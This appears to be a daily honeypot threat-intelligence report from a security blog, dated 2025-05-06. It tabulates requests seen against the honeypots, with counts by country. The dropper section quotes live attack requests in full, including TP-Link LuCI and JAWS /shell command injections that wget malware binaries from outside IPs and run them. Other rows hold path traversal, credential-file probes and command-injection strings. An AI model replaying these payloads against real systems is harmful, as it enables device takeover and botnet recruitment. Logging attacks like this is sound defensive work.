Skip to main content
Shoggoth Industries - Security Blog
  1. Daily-Posts/

Report: 2025-05-06

·1021 words·
Repport Daily
Author
Shoggoth Industries
Table of Contents

Daily Report: 2025-05-06
#

Executive summary
#

interaction report on http service of various Hhoneypot around the world.

executive_summary
#

In today’s repport, we detected 5 stage 1 IP address(es), linked to 5 dropper URL(s).

There are 145 new requests that have never been observed before (these were added to the monitored request database.).

A total of 1355 requests were recorded during the day, originating from 5 different countries, with a peak of 431 requests coming from NL.

ot_simplified_report
#

simplified report for medium-level interactions with honeypots that mimic industrial systems (web site loading, or interactions with the website), for more contact us on social@shoggoth.industries.

source_countrytargeted_country
USGermany
SGGermany
SGGermany
USGermany
SGGermany
USDubai

botnet_dropper_behaviour
#

remote_addrrequest
45.95.147.209GET /cgi-bin/luci/;stok=/locale?form=country&operation=write&country=$(id%3E%60cd+%2Ftmp%3B+rm+-rf+sh%3B+wget+http%3A%2F%2F176.65.148.234%2Fsh%3B+chmod+777+sh%3B+.%2Fsh+tplink%3B+rm+-rf+sh%60) HTTP/1.1
103.77.42.3627;wget%20http://%s:%d/Mozi.m%20-O%20->%20/tmp/Mozi.m;chmod%20777%20/tmp/Mozi.m;/tmp/Mozi.m%20dlink.mips%27$ HTTP/1.0
141.98.11.137GET /cgi-bin/luci/;stok=/locale?form=country&operation=write&country=$(id%3E%60cd+%2Ftmp%3B+rm+-rf+r%3B+wget+http%3A%2F%2F51.38.137.115%2Fr%3B+chmod+777+r%3B+.%2Fr+tplink%3B+rm+-rf+r%60) HTTP/1.1
185.218.84.39GET /shell?killall+-9+arm7;killall+-9+arm4;killall+-9+arm;killall+-9+/bin/sh;killall+-9+/bin/sh;killall+-9+/z/bin;killall+-9+/bin/bash;cd+/tmp;rm+drea4+arm7;wget+http:/\x5C/176.65.144.76/efefa7;chmod+777+efefa7;./efefa7+jaws;wget+http:/\x5C/176.65.144.76/drea4;chmod+777+drea4;./drea4+jaws HTTP/1.1
196.251.72.142GET /shell?cd+/tmp;rm+-rf+j;nohup+wget+http:/\x5C/94.26.90.251/italianbrainrot/g4za.x86;chmod+777+g4za.x86;./g4za.x86+jawsbg;cd+/tmp;rm+-rf+j;nohup+wget+http:/\x5C/94.26.90.251/italianbrainrot/g4za.arm7;chmod+777+g4za.arm7;./g4za.arm7+jawsbg HTTP/1.1

request
#

The list of requests presented here are those that have not yet been yet integrated into the request database.

number_of_occurencerequest
624POST /goform/webLogin HTTP/1.1
1782GET /.env.temp HTTP/1.1
1792GET /.env_ HTTP/1.1
1802POST /wp-admin/admin-ajax.php HTTP/1.1
1911\x03\x00\x00.)\xE0\x00\x00\x00\x00\x00Cookie: mstshash=EBWYXZBE
1981GET /Backend/test HTTP/1.1
2051CONNECT www.naver.com:443 HTTP/1.1
2121GET /src.7z HTTP/1.1
2131GET /bin.7z HTTP/1.1
2141GET /html.7z HTTP/1.1
2151GET /www.7z HTTP/1.1
2161GET /web.7z HTTP/1.1
2171GET /backup.7z HTTP/1.1
2181GET /xxx.xxx.xxx.xxx.rar HTTP/1.1
2191GET /old.rar HTTP/1.1
2201GET /data.rar HTTP/1.1
2211GET /upload.rar HTTP/1.1
2221GET /bin/bin.rar HTTP/1.1
2231GET /web.config.rar HTTP/1.1
2241GET /portal.rar HTTP/1.1
2251GET /source.rar HTTP/1.1
2261GET /src.rar HTTP/1.1
2281GET /portal.tar HTTP/1.1
2291GET /source.tar HTTP/1.1
2301GET /src.tar HTTP/1.1
2311GET /bin.tar HTTP/1.1
2321GET /html.tar HTTP/1.1
2341GET /web.tar HTTP/1.1
2361GET /xxx.xxx.xxx.xxx.7z HTTP/1.1
2371GET /old.7z HTTP/1.1
2381GET /data.7z HTTP/1.1
2391GET /upload.7z HTTP/1.1
2401GET /bin/bin.7z HTTP/1.1
2411GET /web.config.7z HTTP/1.1
2421GET /portal.7z HTTP/1.1
2431GET /source.7z HTTP/1.1
2441GET /bin/bin.gz HTTP/1.1
2451GET /web.config.gz HTTP/1.1
2461GET /portal.gz HTTP/1.1
2471GET /source.gz HTTP/1.1
2481GET /src.gz HTTP/1.1
2491GET /bin.gz HTTP/1.1
2501GET /html.gz HTTP/1.1
2511GET /www.gz HTTP/1.1
2521GET /web.gz HTTP/1.1
2531GET /backup.gz HTTP/1.1
2541GET /xxx.xxx.xxx.xxx.tar HTTP/1.1
2551GET /old.tar HTTP/1.1
2561GET /data.tar HTTP/1.1
2571GET /upload.tar HTTP/1.1
2581GET /bin/bin.tar HTTP/1.1
2591GET /web.config.tar HTTP/1.1
2601GET /data.tar.gz HTTP/1.1
2611GET /upload.tar.gz HTTP/1.1
2621GET /bin/bin.tar.gz HTTP/1.1
2631GET /web.config.tar.gz HTTP/1.1
2641GET /portal.tar.gz HTTP/1.1
2651GET /source.tar.gz HTTP/1.1
2661GET /src.tar.gz HTTP/1.1
2671GET /bin.tar.gz HTTP/1.1
2681GET /html.tar.gz HTTP/1.1
2691GET /www.tar.gz HTTP/1.1
2701GET /web.tar.gz HTTP/1.1
2721GET /xxx.xxx.xxx.xxx.gz HTTP/1.1
2731GET /old.gz HTTP/1.1
2741GET /data.gz HTTP/1.1
2751GET /upload.gz HTTP/1.1
2761POST /clients/MyCRL HTTP/1.1
2771GET /classes/common/busiFacade.php HTTP/1.1
2781GET /render/info.html HTTP/1.1
2791GET /cslu/v1/var/logs/customer-cslu-lib-log.log HTTP/1.1
2801GET /access/set?param=enableapi&value=1 HTTP/1.1
2811GET /cslu/v1/scheduler/jobs HTTP/1.1
2821POST /task/submit/ HTTP/1.1
2831GET /filex/read-raw?url=http://oast.me&cut=1 HTTP/1.1
2841GET /file=http://oast.pro HTTP/1.1
2851GET /goanywhere/images/..;/wizard/InitialAccountSetup.xhtml HTTP/1.1
2861POST /index.php/display/status_zigbee HTTP/1.1
2871GET /api/v1/markdown/link:metadata?link=http://localhost:13042 HTTP/1.1
2891GET /unauth/%252e%252e/php/ztp_gate.php/PAN_help/x.css HTTP/1.1
2901GET /xxx.xxx.xxx.xxx.tar.gz HTTP/1.1
2911GET /old.tar.gz HTTP/1.1
2921\x00\x0E8\xF7\xC2*D2o]L\x00\x00\x00\x00\x00
2951GET /__screenshot-error?file=/etc/passwd HTTP/1.1
2961GET /%2e%2e/%2e%2e/etc/passwd HTTP/1.1
2971GET /file=c:%5Cwindows%5Cwin.ini HTTP/1.1
2981GET /file=/etc/passwd HTTP/1.1
2991GET /cgi-bin/account_mgr.cgi?cmd=cgi_user_add&name=%27;id;%27 HTTP/1.1
3001GET /cgi-bin/admin.cgi?Command=sysCommand&Cmd=ifconfig HTTP/1.1
3011POST /classes/common/busiFacade.php HTTP/1.1
3021GET /php/ztp_gate.php/.js.map HTTP/1.1
3031GET /interview?i=/etc/passwd HTTP/1.1
3041GET /device/config HTTP/1.1
3051GET /system/config_menu.htm HTTP/1.1
3061GET /?p=3232&wp_automatic=download&link=file:///etc/passwd HTTP/1.1
3071GET /Admin/Admin.aspx HTTP/1.1
3081GET /bin.rar HTTP/1.1
3091GET /html.rar HTTP/1.1
3101GET /www.rar HTTP/1.1
3111GET /web.rar HTTP/1.1
3131GET /xxx.xxx.xxx.xxx.zip HTTP/1.1
3141GET /old.zip HTTP/1.1
3151GET /data.zip HTTP/1.1
3161GET /upload.zip HTTP/1.1
3171GET /bin/bin.zip HTTP/1.1
3181GET /web.config.zip HTTP/1.1
3191GET /portal.zip HTTP/1.1
3201GET /source.zip HTTP/1.1
3211GET /src.zip HTTP/1.1
3221GET /bin.zip HTTP/1.1
3231GET /html.zip HTTP/1.1
3531GET /www.zip HTTP/1.1
3541GET /web.zip HTTP/1.1
4361GET /admin/assets/css/jquery-ui.css HTTP/1.0
4601POST /api/user/binLookup?time=1746507200284418536 HTTP/1.1
4611GET /api/bin/440393?time=1746507199789887630 HTTP/1.1
4621GET /config/index?time=1746506624750874530 HTTP/1.1
4681\x00\x0E8\xD44\x0C\x95\x9C\xD8\xCCB\x00\x00\x00\x00\x00
5001GET /.AWS/test HTTP/1.1
5011GET /.aws/test HTTP/1.1
5101POST /api/user/binLookup?time=1746507471189537658 HTTP/1.1
5111GET /api/bin/440393?time=1746507470788211294 HTTP/1.1
5121GET /config/index?time=1746506740960468304 HTTP/1.1
5171GET /stage/test HTTP/1.1
5181GET /config/test HTTP/1.1
5191GET /twilio/test HTTP/1.1
5201GET /staging/test HTTP/1.1
5211GET /server/test HTTP/1.1
5221GET /media/test HTTP/1.1
5231GET /crm/test HTTP/1.1
5241GET /vendor/test HTTP/1.1
5251GET /app/test HTTP/1.1
5261GET /admin/test HTTP/1.1
5271GET /Api/test HTTP/1.1
5281GET /API/test HTTP/1.1
5291GET /api/test HTTP/1.1
5301GET /backend/test HTTP/1.1
5311GET /.Aws/test HTTP/1.1
5411GET /Odin/http/call1746559309 HTTP/1.1
5421GET /OdinHttpCall1746559309 HTTP/1.1
5431GET /odinhttpcall1746559309 HTTP/1.1
5511GET /Odin/http/call1746560918 HTTP/1.1
5521GET /OdinHttpCall1746560918 HTTP/1.1
5571\x00\x0E8\x92\xE6v\x11P)\x17\x15\x00\x00\x00\x00\x00
5581GET /odinhttpcall1746560918 HTTP/1.1

country_iso_code
#

number_of_occurencecountry_iso_code
0431NL
1240US
2151GB
3113AE
4111CN
578DE
642PL
718SC
814AZ
914RU
1012CA
1112IN
1211AO
1311JP
1411IL
1510PT
169SG
178GH
186MD
195KR
205BE
214ID
224UA
234BR
244BG
253MC
263HK
273PK
283FR
293IR
302NG
312VE
321MY
331TH
341IT
351TW
361LT
371MX
381ES
391GE

Related

Report: 2025-05-05
·284 words
Repport Daily
Report: 2025-05-04
·471 words
Repport Daily
Report: 2025-05-03
·440 words
Repport Daily